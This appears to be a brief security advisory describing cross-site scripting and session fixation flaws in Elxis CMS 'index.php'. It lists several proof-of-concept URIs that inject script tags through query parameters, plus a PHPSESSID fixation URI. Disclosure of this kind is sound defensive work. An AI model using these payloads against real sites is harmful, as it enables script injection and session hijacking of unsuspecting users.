|
Elxis CMS 'index.php' Multiple Cross Site Scripting and Session Fixation Vulnerabilities
To exploit these issues an attacker entices an unsuspecting user into following a malicious URI. The following example URIs are available for the cross-site scripting issues: http://www.example.net/index.php?>"><script>alert("XSS Vuln")</script> http://www.example.net/index.php?option=>"><script>alert("XSS Vuln")</script> http://www.example.net/index.php?option=com_poll&Itemid=>"><script>alert("XSS Vuln")</script> http://www.example.net/index.php?option=com_poll&task=view&id=>"><script>alert("XSS Vuln")</script> http://www.example.net/index.php?option=com_poll&Itemid=1&task=>"><script>alert("XSS Vuln")</script> http://www.example.net/index.php?option=com_poll&task=view&bid=>"><script>alert("XSS Vuln")</script> http://www.example.net/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"><script>alert("XSS Vuln")</script> The following example URI is available for the session-fixation attack: http://www.site.com/?PHPSESSID=[session_fixation] |
|
|
Privacy Statement |